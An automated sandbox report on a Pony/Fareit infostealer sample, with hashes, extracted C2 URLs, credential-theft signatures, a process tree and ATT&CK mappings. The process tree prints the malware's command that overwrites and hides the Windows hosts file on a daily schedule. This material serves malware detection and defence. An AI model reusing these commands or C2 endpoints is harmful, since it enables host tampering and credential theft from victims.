Analysis

  • max time kernel
    178s
  • max time network
    187s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2022 06:32

General

  • Target

    b9962d0b637627b669554b6e496e63ada947774d8d30ac79d3c409f782c9b259.exe

  • Size

    102KB

  • MD5

    6ced0ba6fd057de94d044b5eec5ae04b

  • SHA1

    7d05a0dd595149071fe82570c8b1e5caa70af3fe

  • SHA256

    b9962d0b637627b669554b6e496e63ada947774d8d30ac79d3c409f782c9b259

  • SHA512

    a36866f0f207a80e9290f677af04ffdb25c2cf275ebed1d379cbc5646aa614e5ef65e743caf80dc3dd2c9dc04c0f2d44a5c497ea61e9bfca86f43baa1c30a7aa

  • SSDEEP

    3072:OQaoTOMPmEHftr/KlLzJMXYastx6VEiLTz+PfCE:RTRuEHJylL1QYuPLTz

Malware Config

Extracted

Family

pony

C2

http://help2s.info:9135/pic/fly.php

http://hjw4is.info:9135/pic/fly.php

Signatures

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Drops file in Drivers directory 3 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b9962d0b637627b669554b6e496e63ada947774d8d30ac79d3c409f782c9b259.exe
    "C:\Users\Admin\AppData\Local\Temp\b9962d0b637627b669554b6e496e63ada947774d8d30ac79d3c409f782c9b259.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Accesses Microsoft Outlook accounts
    • Accesses Microsoft Outlook profiles
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • outlook_win_path
    PID:1652
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy C:\Windows\system32\drivers\etc\hosts C:\Windows\system32\drivers\etc\hosts.sam /Y && at 07:23:00 /every:M,T,W,Th,F,S,Su cmd.exe "/c attrib -H C:\Windows\system32\drivers\etc\hosts && copy C:\Users\Admin\AppData\Local\Temp\240617812aq C:\Windows\system32\drivers\etc\hosts /Y && attrib +H C:\Windows\system32\drivers\etc\hosts"
      2⤵
      • Drops file in Drivers directory
      • Suspicious use of WriteProcessMemory
      PID:4768
      • C:\Windows\SysWOW64\at.exe
        at 07:23:00 /every:M,T,W,Th,F,S,Su cmd.exe "/c attrib -H C:\Windows\system32\drivers\etc\hosts && copy C:\Users\Admin\AppData\Local\Temp\240617812aq C:\Windows\system32\drivers\etc\hosts /Y && attrib +H C:\Windows\system32\drivers\etc\hosts"
        3⤵
          PID:4204
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\240623656.bat" "C:\Users\Admin\AppData\Local\Temp\b9962d0b637627b669554b6e496e63ada947774d8d30ac79d3c409f782c9b259.exe" "
        2⤵
          PID:1868

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Credential Access

      Credentials in Files

      2
      T1081

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Collection

      Data from Local System

      2
      T1005

      Email Collection

      2
      T1114

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\240623656.bat
        Filesize

        94B

        MD5

        3880eeb1c736d853eb13b44898b718ab

        SHA1

        4eec9d50360cd815211e3c4e6bdd08271b6ec8e6

        SHA256

        936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7

        SHA512

        3eaa3dddd7a11942e75acd44208fbe3d3ff8f4006951cd970fb9ab748c160739409803450d28037e577443504707fc310c634e9dc54d0c25e8cfe6094f017c6b

      • memory/1652-132-0x0000000000400000-0x0000000000435000-memory.dmp
        Filesize

        212KB

      • memory/1652-133-0x0000000002170000-0x00000000021A5000-memory.dmp
        Filesize

        212KB

      • memory/1652-134-0x0000000000400000-0x0000000000435000-memory.dmp
        Filesize

        212KB

      • memory/1652-135-0x0000000000400000-0x0000000000435000-memory.dmp
        Filesize

        212KB

      • memory/1652-136-0x0000000002170000-0x00000000021A5000-memory.dmp
        Filesize

        212KB

      • memory/1652-139-0x0000000000400000-0x0000000000435000-memory.dmp
        Filesize

        212KB

      • memory/1868-138-0x0000000000000000-mapping.dmp
      • memory/4204-140-0x0000000000000000-mapping.dmp
      • memory/4768-137-0x0000000000000000-mapping.dmp